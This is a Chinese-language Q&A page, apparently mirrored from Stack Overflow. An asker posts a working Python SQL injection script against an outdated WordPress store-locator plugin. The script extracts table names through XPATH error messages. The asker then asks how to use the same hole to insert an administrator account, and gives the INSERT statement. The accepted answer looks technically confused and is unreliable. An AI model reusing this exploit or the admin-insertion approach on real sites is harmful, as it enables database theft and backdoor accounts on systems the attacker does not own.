作为一个有抱负的网络安全专家,我一直在练习在我的WordPress安装中执行SQL注入。
具体来说,我选择了一个过时的插件中的vulnerability
到目前为止,我已经能够使用以下代码成功提取数据库信息:

import requests,re
url = 'http://localhost/wp-content/plugins/store-locator/sl-xml.php'

params = {
    "debug":"1",
    "mode":"gen",
    "sl_vars[num_initial_displayed]":"2,1 procedure analyse(extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 90,1))),1);"
}

r = requests.get(url, params=params)
print re.match(r"Invalid query: XPATH syntax error: ':([^']*)'", r.text).group(1)

输出:wp_用户
我的下一个实验是通过这个漏洞添加一个管理帐户,但是我似乎不知道如何正确地查询它。
这些是必要的参数:
INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`)
VALUES ('newadmin', MD5('pass123'), 'firstname lastname', '[email protected]', '0');

通过这种攻击方法,“插入”操作是否可能?

最佳答案

params中用select concat(0x3a,table_name) from information_schema.tables limit 90查询替换INSERT

关于python - 使用Python进行SQL注入(inject)(WordPress),我们在Stack Overflow上找到一个类似的问题:https://stackoverflow.com/questions/34449997/

10-13 03:25